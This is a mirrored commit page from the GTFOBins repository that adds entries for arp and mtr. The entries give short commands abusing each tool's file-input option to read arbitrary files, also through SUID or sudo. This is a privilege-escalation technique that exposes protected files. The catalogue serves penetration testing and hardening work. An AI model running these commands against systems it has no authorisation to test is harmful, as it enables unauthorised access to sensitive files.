mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add arp and mtr. Thanks to https://twitter.com/insecurity_ltd/status/1087727178295529473
This commit is contained in:
parent
d0464d7ce8
commit
fc59ef546f
17
_gtfobins/arp.md
Normal file
17
_gtfobins/arp.md
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
---
|
||||||
|
description: |
|
||||||
|
The read file content is corrupted by error prints.
|
||||||
|
functions:
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
arp -v -f "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./arp -v -f "$LFILE"
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo arp -v -f "$LFILE"
|
||||||
|
---
|
13
_gtfobins/mtr.md
Normal file
13
_gtfobins/mtr.md
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
---
|
||||||
|
description: |
|
||||||
|
The read file content is corrupted by error prints.
|
||||||
|
functions:
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
mtr --raw -F "$LFILE"
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo mtr --raw -F "$LFILE"
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user